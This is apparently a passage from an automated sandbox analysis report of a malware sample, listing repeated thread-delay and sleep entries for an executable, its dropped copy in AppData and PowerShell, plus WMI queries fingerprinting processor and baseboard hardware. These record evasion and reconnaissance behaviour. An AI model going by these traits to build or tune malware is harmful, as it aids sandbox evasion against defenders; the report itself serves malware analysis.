                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 599641
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 599531
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 599422
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 599313
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 599202
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 599094
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 598984
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 598874
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 299988
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 299859
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 299750
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 299640
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 299531
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 299422
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 299311
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 299203
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 299093
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 298984
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 298871
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 298765
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 298656
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 298547
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 298437
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 298328
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 298218
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 298109
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 298000
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 297890
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 297781
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 297671
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 297562
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 297453
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 297330
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 297203
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 297093
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 296984
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 296875
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 296765
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 296656
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 296547
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 296437
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 296316
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 296187
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 296078
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 295968
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 295856
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 295749
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWindow / User API: threadDelayed 396Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6034Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2591Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWindow / User API: threadDelayed 6801Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWindow / User API: threadDelayed 3036Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeWindow / User API: threadDelayed 1649
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeWindow / User API: threadDelayed 8213
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 1264Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3636Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5588Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -26747778906878833s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -599890s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -599781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -599671s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -599562s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -599438s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -599328s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -599219s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -599109s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -599000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -598890s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -598781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -300000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -299875s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -299766s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -299656s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -299547s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -299438s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -299313s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -299188s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -299063s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -298953s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -298844s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -298719s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -298610s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -298485s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -298360s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -298235s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -298110s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -297985s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -297860s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -297735s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -297610s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -297484s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -297375s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -297266s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -297156s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -297047s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -296937s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -296828s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -296719s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -296594s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -296484s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -296375s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -296266s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -296156s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -296047s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -295935s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -295828s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -295719s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200Thread sleep time: -295609s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 3292Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -24903104499507879s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -600000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -599876s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -599750s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -599641s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -599531s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -599422s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -599313s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -599202s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -599094s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -598984s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -598874s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -299988s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -299859s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -299750s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -299640s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -299531s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -299422s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -299311s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -299203s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -299093s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -298984s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -298871s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -298765s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -298656s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -298547s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -298437s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -298328s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -298218s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -298109s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -298000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -297890s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -297781s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -297671s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -297562s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -297453s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -297330s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -297203s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -297093s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -296984s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -296875s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -296765s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -296656s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -296547s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -296437s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -296316s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -296187s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -296078s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -295968s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -295856s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440Thread sleep time: -295749s >= -30000s
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 599890Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 599781Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 599671Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 599562Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 599438Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 599328Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 599219Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 599109Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 599000Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 598890Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 598781Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 300000Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 299875Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 299766Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 299656Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 299547Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 299438Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 299313Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 299188Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 299063Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 298953Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 298844Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 298719Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 298610Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 298485Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 298360Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 298235Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 298110Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 297985Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 297860Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 297735Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 297610Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 297484Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 297375Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 297266Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 297156Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 297047Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 296937Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 296828Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 296719Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 296594Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 296484Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 296375Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 296266Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 296156Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 296047Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 295935Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 295828Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 295719Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 295609Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 599876
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 599750
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 599641
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 599531
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 599422
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 599313
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 599202
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 599094
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 598984
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 598874
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 299988
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 299859
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 299750
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 299640
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 299531
